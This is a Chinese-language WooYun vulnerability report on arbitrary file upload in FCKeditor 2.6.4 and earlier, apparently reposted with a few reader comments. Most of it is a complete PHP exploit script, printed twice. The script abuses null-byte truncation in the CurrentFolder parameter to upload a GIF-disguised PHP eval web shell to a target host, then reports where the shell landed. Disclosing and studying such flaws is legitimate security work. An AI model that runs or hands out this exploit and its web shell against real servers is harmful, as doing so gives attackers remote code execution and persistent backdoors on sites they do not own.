漏洞概要
缺陷编号:WooYun-2011-01684
漏洞标题:fckeditor <= 2.6.4 任意文件上传漏洞
相关厂商:fckeditor
漏洞作者:我勒个去
提交时间:2011-03-22 14:09
公开时间:2011-03-22 14:18
漏洞类型:文件上传导致任意代码执行
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
Tags标签:
漏洞详情
披露状态:
2011-03-22: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-03-22: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
fckeditor <= 2.6.4 任意文件上传漏洞, php coldfunsion应该KO了,asp表示很淡定,其他语言版本未测
详细说明:
currentfolder过滤不给力啊,但是GPC就能让它脑残
漏洞证明:
set_time_limit(0);
ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));
$match = array();function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
print $resp;
return $resp;
}function connector_response($html)
{
global $match;
return (preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/", $html, $match) && in_array($match[1], array(0, 201)));
}print "\n+------------------------------------------------------------------+";
print "\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |";
print "\n+------------------------------------------------------------------+\n";if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /\n";
print "\nExample....: php $argv[0] localhost /FCKEditor/\n";die();
}$host = $argv[1];
$path = ereg_replace("(/){2,}", "/", $argv[2]);$filename = "fvck.gif";
$foldername = "fuck.php%00.gif";
$connector = "editor/filemanager/connectors/php/connector.php";$payload = "-----------------------------265001916915724\r\n";
$payload .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload .= "Content-Type: image/jpeg\r\n\r\n";
$payload .= 'GIF89a'."\r\n".'<?php eval($_POST[a]) ?>'."\n";
$payload .= "-----------------------------265001916915724--\r\n";$packet = "POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";
//print $packet;
$packet.= "Host: {$host}\r\n";$packet .= "Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;print $packet;if (!connector_response(http_send($host, $packet))) die("\n[-] Upload failed!\n");
else print "\n[-] Job done! try http://${host}/$match[2] \n";?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
set_time_limit(0);
ini_set("default_socket_timeout",5);define(STDIN,fopen("php://stdin","r"));
$match=array();functionhttp_send($host,$packet)
{
$sock=fsockopen($host,80);
while(!$sock)
{
print"\n[-] No response from {$host}:80 Trying again...";
$sock=fsockopen($host,80);
}
fputs($sock,$packet);
while(!feof($sock))$resp.=fread($sock,1024);
fclose($sock);
print$resp;
return$resp;
}functionconnector_response($html)
{
global$match;
return(preg_match("/OnUploadCompleted\((\d),\"(.*)\"\)/",$html,$match)&&in_array($match[1],array(0,201)));
}print"\n+------------------------------------------------------------------+";
print"\n| FCKEditor Servelet Arbitrary File Upload Exploit by Wolegequ |";
print"\n+------------------------------------------------------------------+\n";if($argc<3)
{
print"\nUsage......: php $argv[0] host path\n";
print"\nExample....: php $argv[0] localhost /\n";
print"\nExample....: php $argv[0] localhost /FCKEditor/\n";die();
}$host=$argv[1];
$path=ereg_replace("(/){2,}","/",$argv[2]);$filename="fvck.gif";
$foldername="fuck.php%00.gif";
$connector="editor/filemanager/connectors/php/connector.php";$payload="-----------------------------265001916915724\r\n";
$payload.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"{$filename}\"\r\n";
$payload.="Content-Type: image/jpeg\r\n\r\n";
$payload.='GIF89a'."\r\n".'<?phpeval ($_POST[a])?>'."\n";
$payload.="-----------------------------265001916915724--\r\n";$packet="POST {$path}{$connector}?Command=FileUpload&Type=Image&CurrentFolder=".$foldername." HTTP/1.0\r\n";
//print $packet;
$packet.="Host: {$host}\r\n";$packet.="Content-Type: multipart/form-data; boundary=---------------------------265001916915724\r\n";
$packet.="Content-Length: ".strlen($payload)."\r\n";
$packet.="Connection: close\r\n\r\n";
$packet.=$payload;print$packet;if(!connector_response(http_send($host,$packet)))die("\n[-] Upload failed!\n");
elseprint"\n[-] Job done! try http://${host}/$match[2] \n";?>
修复方案:
参见**.**.**.**修复
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞Rank:12 (WooYun评价)
评价
2010-01-01 00:00 xsser 白帽子 | Rank:152 漏洞数:17)
拜
2010-01-01 00:00 Jacks 白帽子 | Rank:142 漏洞数:25)
这个code怎么那么熟悉?不是EgiX 写的那个?
2010-01-01 00:00 m0r5 白帽子 | Rank:30 漏洞数:6)
这不是是EgiX 写的那个?
2010-01-01 00:00 霍家二爷 白帽子 | Rank:63 漏洞数:7)
http://seclists.org/pen-test/2010/Jul/0
截断呀截断
2010-01-01 00:00 G8dSnow 白帽子 | Rank:21 漏洞数:5)
截断各处中招,xss和文件操作都有。。。伤不起。。。
所有媒体,可在保留署名、原文连接的情况下转载,若非则不得使用我方内容。
关注网络安全,分享和记录有趣的资源内容。体验盒子所发布的一切资源仅限用于学习和研究目的。不得用于非法用途,否则,一切后果请用户自负。
2006-2019 体验盒子
×
扫码分享
验证:体验盒子
扫码分享
×